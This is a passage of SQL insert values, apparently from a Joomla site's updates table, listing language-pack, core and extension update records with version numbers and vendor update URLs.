(51, 3, 0, 'Turkish', '', 'pkg_tr-TR', 'package', '', 0, '3.9.4.1', '', 'https://update.joomla.org/language/details3/tr-TR_details.xml', '', ''),
(52, 3, 0, 'Ukrainian', '', 'pkg_uk-UA', 'package', '', 0, '3.7.1.1', '', 'https://update.joomla.org/language/details3/uk-UA_details.xml', '', ''),
(53, 3, 0, 'Uyghur', '', 'pkg_ug-CN', 'package', '', 0, '3.7.5.1', '', 'https://update.joomla.org/language/details3/ug-CN_details.xml', '', ''),
(54, 3, 0, 'Albanian', '', 'pkg_sq-AL', 'package', '', 0, '3.1.1.2', '', 'https://update.joomla.org/language/details3/sq-AL_details.xml', '', ''),
(55, 3, 0, 'Basque', '', 'pkg_eu-ES', 'package', '', 0, '3.7.5.1', '', 'https://update.joomla.org/language/details3/eu-ES_details.xml', '', ''),
(56, 3, 0, 'Hindi', '', 'pkg_hi-IN', 'package', '', 0, '3.3.6.2', '', 'https://update.joomla.org/language/details3/hi-IN_details.xml', '', ''),
(57, 3, 0, 'German DE', '', 'pkg_de-DE', 'package', '', 0, '3.9.6.1', '', 'https://update.joomla.org/language/details3/de-DE_details.xml', '', ''),
(58, 3, 0, 'Portuguese Brazil', '', 'pkg_pt-BR', 'package', '', 0, '3.9.6.1', '', 'https://update.joomla.org/language/details3/pt-BR_details.xml', '', ''),
(59, 3, 0, 'Serbian Latin', '', 'pkg_sr-YU', 'package', '', 0, '3.9.6.1', '', 'https://update.joomla.org/language/details3/sr-YU_details.xml', '', ''),
(60, 3, 0, 'Spanish', '', 'pkg_es-ES', 'package', '', 0, '3.9.5.1', '', 'https://update.joomla.org/language/details3/es-ES_details.xml', '', ''),
(61, 3, 0, 'Bosnian', '', 'pkg_bs-BA', 'package', '', 0, '3.9.6.1', '', 'https://update.joomla.org/language/details3/bs-BA_details.xml', '', ''),
(62, 3, 0, 'Serbian Cyrillic', '', 'pkg_sr-RS', 'package', '', 0, '3.9.6.1', '', 'https://update.joomla.org/language/details3/sr-RS_details.xml', '', ''),
(63, 3, 0, 'Vietnamese', '', 'pkg_vi-VN', 'package', '', 0, '3.2.1.2', '', 'https://update.joomla.org/language/details3/vi-VN_details.xml', '', ''),
(64, 3, 0, 'Bahasa Indonesia', '', 'pkg_id-ID', 'package', '', 0, '3.6.2.1', '', 'https://update.joomla.org/language/details3/id-ID_details.xml', '', ''),
(65, 3, 0, 'Finnish', '', 'pkg_fi-FI', 'package', '', 0, '3.9.6.1', '', 'https://update.joomla.org/language/details3/fi-FI_details.xml', '', ''),
(66, 3, 0, 'Swahili', '', 'pkg_sw-KE', 'package', '', 0, '3.9.6.1', '', 'https://update.joomla.org/language/details3/sw-KE_details.xml', '', ''),
(67, 3, 0, 'Montenegrin', '', 'pkg_srp-ME', 'package', '', 0, '3.3.1.2', '', 'https://update.joomla.org/language/details3/srp-ME_details.xml', '', ''),
(68, 3, 0, 'English CA', '', 'pkg_en-CA', 'package', '', 0, '3.9.6.1', '', 'https://update.joomla.org/language/details3/en-CA_details.xml', '', ''),
(69, 3, 0, 'French CA', '', 'pkg_fr-CA', 'package', '', 0, '3.6.5.1', '', 'https://update.joomla.org/language/details3/fr-CA_details.xml', '', ''),
(70, 3, 0, 'Welsh', '', 'pkg_cy-GB', 'package', '', 0, '3.9.2.1', '', 'https://update.joomla.org/language/details3/cy-GB_details.xml', '', ''),
(71, 3, 0, 'Sinhala', '', 'pkg_si-LK', 'package', '', 0, '3.3.1.2', '', 'https://update.joomla.org/language/details3/si-LK_details.xml', '', ''),
(72, 3, 0, 'Dari Persian', '', 'pkg_prs-AF', 'package', '', 0, '3.4.4.2', '', 'https://update.joomla.org/language/details3/prs-AF_details.xml', '', ''),
(73, 3, 0, 'Turkmen', '', 'pkg_tk-TM', 'package', '', 0, '3.5.0.2', '', 'https://update.joomla.org/language/details3/tk-TM_details.xml', '', ''),
(74, 3, 0, 'Irish', '', 'pkg_ga-IE', 'package', '', 0, '3.8.13.1', '', 'https://update.joomla.org/language/details3/ga-IE_details.xml', '', ''),
(75, 3, 0, 'Dzongkha', '', 'pkg_dz-BT', 'package', '', 0, '3.6.2.1', '', 'https://update.joomla.org/language/details3/dz-BT_details.xml', '', ''),
(76, 3, 0, 'Slovenian', '', 'pkg_sl-SI', 'package', '', 0, '3.9.6.1', '', 'https://update.joomla.org/language/details3/sl-SI_details.xml', '', ''),
(77, 3, 0, 'Spanish CO', '', 'pkg_es-CO', 'package', '', 0, '3.9.6.1', '', 'https://update.joomla.org/language/details3/es-CO_details.xml', '', ''),
(78, 3, 0, 'German CH', '', 'pkg_de-CH', 'package', '', 0, '3.9.6.1', '', 'https://update.joomla.org/language/details3/de-CH_details.xml', '', ''),
(79, 3, 0, 'German AT', '', 'pkg_de-AT', 'package', '', 0, '3.9.6.1', '', 'https://update.joomla.org/language/details3/de-AT_details.xml', '', ''),
(80, 3, 0, 'German LI', '', 'pkg_de-LI', 'package', '', 0, '3.9.6.1', '', 'https://update.joomla.org/language/details3/de-LI_details.xml', '', ''),
(81, 3, 0, 'German LU', '', 'pkg_de-LU', 'package', '', 0, '3.9.6.1', '', 'https://update.joomla.org/language/details3/de-LU_details.xml', '', ''),
(82, 3, 0, 'English NZ', '', 'pkg_en-NZ', 'package', '', 0, '3.9.6.1', '', 'https://update.joomla.org/language/details3/en-NZ_details.xml', '', ''),
(83, 3, 0, 'Kazakh', '', 'pkg_kk-KZ', 'package', '', 0, '3.9.6.1', '', 'https://update.joomla.org/language/details3/kk-KZ_details.xml', '', ''),
(84, 3, 0, 'Lithuanian', '', 'pkg_lt-LT', 'package', '', 0, '3.9.6.1', '', 'https://update.joomla.org/language/details3/lt-LT_details.xml', '', ''),
(85, 17, 0, 'Convert Forms Free', 'Convert Forms Free', 'com_convertforms', 'component', '', 1, '2.3.3', '', 'https://static.tassos.gr/update/convertformsfree?type=.xml', 'https://www.tassos.gr/update/convertformsfree?view=Items&release_id=473', 'dlid=ace5ce174390a9e1bbdb8dfb5c836224'),
(87, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.8', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(88, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.8', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(89, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.8', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(90, 3, 0, 'Flemish', '', 'pkg_nl-BE', 'package', '', 0, '3.9.7.1', '', 'https://update.joomla.org/language/details3/nl-BE_details.xml', '', ''),
(91, 3, 0, 'French', '', 'pkg_fr-FR', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/fr-FR_details.xml', '', ''),
(92, 3, 0, 'Georgian', '', 'pkg_ka-GE', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/ka-GE_details.xml', '', ''),
(93, 3, 0, 'Greek', '', 'pkg_el-GR', 'package', '', 0, '3.9.7.1', '', 'https://update.joomla.org/language/details3/el-GR_details.xml', '', ''),
(94, 3, 0, 'Japanese', '', 'pkg_ja-JP', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/ja-JP_details.xml', '', ''),
(95, 3, 0, 'Chinese Simplified', '', 'pkg_zh-CN', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/zh-CN_details.xml', '', ''),
(96, 3, 0, 'Danish', '', 'pkg_da-DK', 'package', '', 0, '3.9.7.1', '', 'https://update.joomla.org/language/details3/da-DK_details.xml', '', ''),
(97, 3, 0, 'Italian', '', 'pkg_it-IT', 'package', '', 0, '3.9.7.1', '', 'https://update.joomla.org/language/details3/it-IT_details.xml', '', ''),
(98, 3, 0, 'Lithuanian', '', 'pkg_lt-LT', 'package', '', 0, '3.9.6.1', '', 'https://update.joomla.org/language/details3/lt-LT_details.xml', '', ''),
(99, 3, 0, 'Swedish', '', 'pkg_sv-SE', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/sv-SE_details.xml', '', ''),
(100, 3, 0, 'Tamil', '', 'pkg_ta-IN', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/ta-IN_details.xml', '', ''),
(101, 3, 0, 'Thai', '', 'pkg_th-TH', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/th-TH_details.xml', '', ''),
(102, 3, 0, 'German DE', '', 'pkg_de-DE', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/de-DE_details.xml', '', ''),
(103, 3, 0, 'Portuguese Brazil', '', 'pkg_pt-BR', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/pt-BR_details.xml', '', ''),
(104, 3, 0, 'Serbian Latin', '', 'pkg_sr-YU', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/sr-YU_details.xml', '', ''),
(105, 3, 0, 'Serbian Cyrillic', '', 'pkg_sr-RS', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/sr-RS_details.xml', '', ''),
(106, 3, 0, 'Swahili', '', 'pkg_sw-KE', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/sw-KE_details.xml', '', ''),
(107, 3, 0, 'Slovenian', '', 'pkg_sl-SI', 'package', '', 0, '3.9.7.1', '', 'https://update.joomla.org/language/details3/sl-SI_details.xml', '', ''),
(108, 3, 0, 'German CH', '', 'pkg_de-CH', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/de-CH_details.xml', '', ''),
(109, 3, 0, 'German AT', '', 'pkg_de-AT', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/de-AT_details.xml', '', ''),
(110, 3, 0, 'German LI', '', 'pkg_de-LI', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/de-LI_details.xml', '', ''),
(111, 3, 0, 'German LU', '', 'pkg_de-LU', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/de-LU_details.xml', '', ''),
(112, 17, 0, 'Convert Forms Free', 'Convert Forms Free', 'com_convertforms', 'component', '', 1, '2.3.3', '', 'https://static.tassos.gr/update/convertformsfree?type=.xml', 'https://www.tassos.gr/update/convertformsfree?view=Items&release_id=473', 'dlid=ace5ce174390a9e1bbdb8dfb5c836224'),
(113, 18, 0, 'JCE 2.7.14', '', 'pkg_jce', 'package', '', 0, '2.7.14', '', 'https://cdn.joomlacontenteditor.net/updates/xml/editor/pkg_jce.xml', 'https://www.joomlacontenteditor.net/news/jce-pro-2-7-14-released', ''),
(114, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.8', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(115, 3, 0, 'Romanian', '', 'pkg_ro-RO', 'package', '', 0, '3.9.7.1', '', 'https://update.joomla.org/language/details3/ro-RO_details.xml', '', ''),
(116, 3, 0, 'Flemish', '', 'pkg_nl-BE', 'package', '', 0, '3.9.7.1', '', 'https://update.joomla.org/language/details3/nl-BE_details.xml', '', ''),
(117, 3, 0, 'French', '', 'pkg_fr-FR', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/fr-FR_details.xml', '', ''),
(118, 3, 0, 'Georgian', '', 'pkg_ka-GE', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/ka-GE_details.xml', '', ''),
(119, 3, 0, 'Greek', '', 'pkg_el-GR', 'package', '', 0, '3.9.7.1', '', 'https://update.joomla.org/language/details3/el-GR_details.xml', '', ''),
(120, 3, 0, 'Japanese', '', 'pkg_ja-JP', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/ja-JP_details.xml', '', ''),
(121, 3, 0, 'Chinese Simplified', '', 'pkg_zh-CN', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/zh-CN_details.xml', '', ''),
(122, 3, 0, 'Danish', '', 'pkg_da-DK', 'package', '', 0, '3.9.7.1', '', 'https://update.joomla.org/language/details3/da-DK_details.xml', '', ''),
(123, 3, 0, 'Italian', '', 'pkg_it-IT', 'package', '', 0, '3.9.7.1', '', 'https://update.joomla.org/language/details3/it-IT_details.xml', '', ''),
(124, 3, 0, 'Lithuanian', '', 'pkg_lt-LT', 'package', '', 0, '3.9.6.1', '', 'https://update.joomla.org/language/details3/lt-LT_details.xml', '', ''),
(125, 3, 0, 'Persian', '', 'pkg_fa-IR', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/fa-IR_details.xml', '', ''),
(126, 3, 0, 'Slovak', '', 'pkg_sk-SK', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/sk-SK_details.xml', '', ''),
(127, 3, 0, 'Swedish', '', 'pkg_sv-SE', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/sv-SE_details.xml', '', ''),
(128, 3, 0, 'Tamil', '', 'pkg_ta-IN', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/ta-IN_details.xml', '', ''),
(129, 3, 0, 'Thai', '', 'pkg_th-TH', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/th-TH_details.xml', '', ''),
(130, 3, 0, 'German DE', '', 'pkg_de-DE', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/de-DE_details.xml', '', ''),
(131, 3, 0, 'Portuguese Brazil', '', 'pkg_pt-BR', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/pt-BR_details.xml', '', ''),
(132, 3, 0, 'Serbian Latin', '', 'pkg_sr-YU', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/sr-YU_details.xml', '', ''),
(133, 3, 0, 'Serbian Cyrillic', '', 'pkg_sr-RS', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/sr-RS_details.xml', '', ''),
(134, 3, 0, 'Swahili', '', 'pkg_sw-KE', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/sw-KE_details.xml', '', ''),
(135, 3, 0, 'Welsh', '', 'pkg_cy-GB', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/cy-GB_details.xml', '', ''),
(136, 3, 0, 'Slovenian', '', 'pkg_sl-SI', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/sl-SI_details.xml', '', ''),
(137, 3, 0, 'German CH', '', 'pkg_de-CH', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/de-CH_details.xml', '', ''),
(138, 3, 0, 'German AT', '', 'pkg_de-AT', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/de-AT_details.xml', '', ''),
(139, 3, 0, 'German LI', '', 'pkg_de-LI', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/de-LI_details.xml', '', ''),
(140, 3, 0, 'German LU', '', 'pkg_de-LU', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/de-LU_details.xml', '', ''),
(141, 3, 0, 'Kazakh', '', 'pkg_kk-KZ', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/kk-KZ_details.xml', '', ''),
(142, 17, 0, 'Convert Forms Free', 'Convert Forms Free', 'com_convertforms', 'component', '', 1, '2.3.3', '', 'https://static.tassos.gr/update/convertformsfree?type=.xml', 'https://www.tassos.gr/update/convertformsfree?view=Items&release_id=473', 'dlid=ace5ce174390a9e1bbdb8dfb5c836224'),
(143, 18, 0, 'JCE 2.7.14', '', 'pkg_jce', 'package', '', 0, '2.7.14', '', 'https://cdn.joomlacontenteditor.net/updates/xml/editor/pkg_jce.xml', 'https://www.joomlacontenteditor.net/news/jce-pro-2-7-14-released', ''),
(144, 3, 0, 'Romanian', '', 'pkg_ro-RO', 'package', '', 0, '3.9.7.1', '', 'https://update.joomla.org/language/details3/ro-RO_details.xml', '', ''),
(145, 3, 0, 'Flemish', '', 'pkg_nl-BE', 'package', '', 0, '3.9.7.1', '', 'https://update.joomla.org/language/details3/nl-BE_details.xml', '', ''),
(146, 3, 0, 'French', '', 'pkg_fr-FR', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/fr-FR_details.xml', '', ''),
(147, 3, 0, 'Georgian', '', 'pkg_ka-GE', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/ka-GE_details.xml', '', ''),
(148, 3, 0, 'Greek', '', 'pkg_el-GR', 'package', '', 0, '3.9.7.1', '', 'https://update.joomla.org/language/details3/el-GR_details.xml', '', ''),
(149, 3, 0, 'Japanese', '', 'pkg_ja-JP', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/ja-JP_details.xml', '', ''),
(150, 3, 0, 'Chinese Simplified', '', 'pkg_zh-CN', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/zh-CN_details.xml', '', ''),
(151, 3, 0, 'Danish', '', 'pkg_da-DK', 'package', '', 0, '3.9.7.1', '', 'https://update.joomla.org/language/details3/da-DK_details.xml', '', ''),
(152, 3, 0, 'Italian', '', 'pkg_it-IT', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/it-IT_details.xml', '', ''),
(153, 3, 0, 'Lithuanian', '', 'pkg_lt-LT', 'package', '', 0, '3.9.6.1', '', 'https://update.joomla.org/language/details3/lt-LT_details.xml', '', ''),
(154, 3, 0, 'Persian', '', 'pkg_fa-IR', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/fa-IR_details.xml', '', ''),
(155, 3, 0, 'Slovak', '', 'pkg_sk-SK', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/sk-SK_details.xml', '', ''),
(156, 3, 0, 'Swedish', '', 'pkg_sv-SE', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/sv-SE_details.xml', '', ''),
(157, 3, 0, 'Tamil', '', 'pkg_ta-IN', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/ta-IN_details.xml', '', ''),
(158, 3, 0, 'Thai', '', 'pkg_th-TH', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/th-TH_details.xml', '', ''),
(159, 3, 0, 'German DE', '', 'pkg_de-DE', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/de-DE_details.xml', '', ''),
(160, 3, 0, 'Portuguese Brazil', '', 'pkg_pt-BR', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/pt-BR_details.xml', '', ''),
(161, 3, 0, 'Serbian Latin', '', 'pkg_sr-YU', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/sr-YU_details.xml', '', ''),
(162, 3, 0, 'Serbian Cyrillic', '', 'pkg_sr-RS', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/sr-RS_details.xml', '', ''),
(163, 3, 0, 'Swahili', '', 'pkg_sw-KE', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/sw-KE_details.xml', '', ''),
(164, 3, 0, 'Welsh', '', 'pkg_cy-GB', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/cy-GB_details.xml', '', ''),
(165, 3, 0, 'Slovenian', '', 'pkg_sl-SI', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/sl-SI_details.xml', '', ''),
(166, 3, 0, 'German CH', '', 'pkg_de-CH', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/de-CH_details.xml', '', ''),
(167, 3, 0, 'German AT', '', 'pkg_de-AT', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/de-AT_details.xml', '', ''),
(168, 3, 0, 'German LI', '', 'pkg_de-LI', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/de-LI_details.xml', '', ''),
(169, 3, 0, 'German LU', '', 'pkg_de-LU', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/de-LU_details.xml', '', ''),
(170, 3, 0, 'Kazakh', '', 'pkg_kk-KZ', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/kk-KZ_details.xml', '', ''),
(171, 17, 0, 'Convert Forms Free', 'Convert Forms Free', 'com_convertforms', 'component', '', 1, '2.3.3', '', 'https://static.tassos.gr/update/convertformsfree?type=.xml', 'https://www.tassos.gr/update/convertformsfree?view=Items&release_id=473', 'dlid=ace5ce174390a9e1bbdb8dfb5c836224'),
(172, 18, 0, 'JCE 2.7.14', '', 'pkg_jce', 'package', '', 0, '2.7.14', '', 'https://cdn.joomlacontenteditor.net/updates/xml/editor/pkg_jce.xml', 'https://www.joomlacontenteditor.net/news/jce-pro-2-7-14-released', ''),
(173, 3, 0, 'Romanian', '', 'pkg_ro-RO', 'package', '', 0, '3.9.7.1', '', 'https://update.joomla.org/language/details3/ro-RO_details.xml', '', ''),
(174, 3, 0, 'Flemish', '', 'pkg_nl-BE', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/nl-BE_details.xml', '', ''),
(175, 3, 0, 'French', '', 'pkg_fr-FR', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/fr-FR_details.xml', '', ''),
(176, 3, 0, 'Georgian', '', 'pkg_ka-GE', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/ka-GE_details.xml', '', ''),
(177, 3, 0, 'Greek', '', 'pkg_el-GR', 'package', '', 0, '3.9.7.1', '', 'https://update.joomla.org/language/details3/el-GR_details.xml', '', ''),
(178, 3, 0, 'Japanese', '', 'pkg_ja-JP', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/ja-JP_details.xml', '', ''),
(179, 3, 0, 'Chinese Simplified', '', 'pkg_zh-CN', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/zh-CN_details.xml', '', ''),
(180, 3, 0, 'Danish', '', 'pkg_da-DK', 'package', '', 0, '3.9.7.1', '', 'https://update.joomla.org/language/details3/da-DK_details.xml', '', ''),
(181, 3, 0, 'Italian', '', 'pkg_it-IT', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/it-IT_details.xml', '', ''),
(182, 3, 0, 'Lithuanian', '', 'pkg_lt-LT', 'package', '', 0, '3.9.6.1', '', 'https://update.joomla.org/language/details3/lt-LT_details.xml', '', ''),
(183, 3, 0, 'Persian', '', 'pkg_fa-IR', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/fa-IR_details.xml', '', ''),
(184, 3, 0, 'Russian', '', 'pkg_ru-RU', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/ru-RU_details.xml', '', ''),
(185, 3, 0, 'Slovak', '', 'pkg_sk-SK', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/sk-SK_details.xml', '', ''),
(186, 3, 0, 'Swedish', '', 'pkg_sv-SE', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/sv-SE_details.xml', '', ''),
(187, 3, 0, 'Tamil', '', 'pkg_ta-IN', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/ta-IN_details.xml', '', ''),
(188, 3, 0, 'Thai', '', 'pkg_th-TH', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/th-TH_details.xml', '', ''),
(189, 3, 0, 'German DE', '', 'pkg_de-DE', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/de-DE_details.xml', '', ''),
(190, 3, 0, 'Portuguese Brazil', '', 'pkg_pt-BR', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/pt-BR_details.xml', '', ''),
(191, 3, 0, 'Serbian Latin', '', 'pkg_sr-YU', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/sr-YU_details.xml', '', ''),
(192, 3, 0, 'Serbian Cyrillic', '', 'pkg_sr-RS', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/sr-RS_details.xml', '', ''),
(193, 3, 0, 'Swahili', '', 'pkg_sw-KE', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/sw-KE_details.xml', '', ''),
(194, 3, 0, 'Welsh', '', 'pkg_cy-GB', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/cy-GB_details.xml', '', ''),
(195, 3, 0, 'Slovenian', '', 'pkg_sl-SI', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/sl-SI_details.xml', '', ''),
(196, 3, 0, 'German CH', '', 'pkg_de-CH', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/de-CH_details.xml', '', ''),
(197, 3, 0, 'German AT', '', 'pkg_de-AT', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/de-AT_details.xml', '', ''),
(198, 3, 0, 'German LI', '', 'pkg_de-LI', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/de-LI_details.xml', '', ''),
(199, 3, 0, 'German LU', '', 'pkg_de-LU', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/de-LU_details.xml', '', ''),
(200, 3, 0, 'Kazakh', '', 'pkg_kk-KZ', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/kk-KZ_details.xml', '', ''),
(201, 17, 0, 'Convert Forms Free', 'Convert Forms Free', 'com_convertforms', 'component', '', 1, '2.3.3', '', 'https://static.tassos.gr/update/convertformsfree?type=.xml', 'https://www.tassos.gr/update/convertformsfree?view=Items&release_id=473', 'dlid=ace5ce174390a9e1bbdb8dfb5c836224'),
(202, 18, 0, 'JCE 2.7.14', '', 'pkg_jce', 'package', '', 0, '2.7.14', '', 'https://cdn.joomlacontenteditor.net/updates/xml/editor/pkg_jce.xml', 'https://www.joomlacontenteditor.net/news/jce-pro-2-7-14-released', ''),
(203, 3, 0, 'Romanian', '', 'pkg_ro-RO', 'package', '', 0, '3.9.7.1', '', 'https://update.joomla.org/language/details3/ro-RO_details.xml', '', ''),
(204, 3, 0, 'Flemish', '', 'pkg_nl-BE', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/nl-BE_details.xml', '', ''),
(205, 3, 0, 'French', '', 'pkg_fr-FR', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/fr-FR_details.xml', '', ''),
(206, 3, 0, 'Georgian', '', 'pkg_ka-GE', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/ka-GE_details.xml', '', ''),
(207, 3, 0, 'Greek', '', 'pkg_el-GR', 'package', '', 0, '3.9.7.1', '', 'https://update.joomla.org/language/details3/el-GR_details.xml', '', ''),
(208, 3, 0, 'Japanese', '', 'pkg_ja-JP', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/ja-JP_details.xml', '', ''),
(209, 3, 0, 'Chinese Simplified', '', 'pkg_zh-CN', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/zh-CN_details.xml', '', ''),
(210, 3, 0, 'Danish', '', 'pkg_da-DK', 'package', '', 0, '3.9.7.1', '', 'https://update.joomla.org/language/details3/da-DK_details.xml', '', ''),
(211, 3, 0, 'Italian', '', 'pkg_it-IT', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/it-IT_details.xml', '', ''),
(212, 3, 0, 'Lithuanian', '', 'pkg_lt-LT', 'package', '', 0, '3.9.6.1', '', 'https://update.joomla.org/language/details3/lt-LT_details.xml', '', ''),
(213, 3, 0, 'Persian', '', 'pkg_fa-IR', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/fa-IR_details.xml', '', ''),
(214, 3, 0, 'Russian', '', 'pkg_ru-RU', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/ru-RU_details.xml', '', ''),
(215, 3, 0, 'Slovak', '', 'pkg_sk-SK', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/sk-SK_details.xml', '', ''),
(216, 3, 0, 'Swedish', '', 'pkg_sv-SE', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/sv-SE_details.xml', '', ''),
(217, 3, 0, 'Tamil', '', 'pkg_ta-IN', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/ta-IN_details.xml', '', ''),
(218, 3, 0, 'Thai', '', 'pkg_th-TH', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/th-TH_details.xml', '', ''),
(219, 3, 0, 'German DE', '', 'pkg_de-DE', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/de-DE_details.xml', '', ''),
(220, 3, 0, 'Portuguese Brazil', '', 'pkg_pt-BR', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/pt-BR_details.xml', '', ''),
(221, 3, 0, 'Serbian Latin', '', 'pkg_sr-YU', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/sr-YU_details.xml', '', ''),
(222, 3, 0, 'Serbian Cyrillic', '', 'pkg_sr-RS', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/sr-RS_details.xml', '', ''),
(223, 3, 0, 'Swahili', '', 'pkg_sw-KE', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/sw-KE_details.xml', '', ''),
(224, 3, 0, 'Welsh', '', 'pkg_cy-GB', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/cy-GB_details.xml', '', ''),
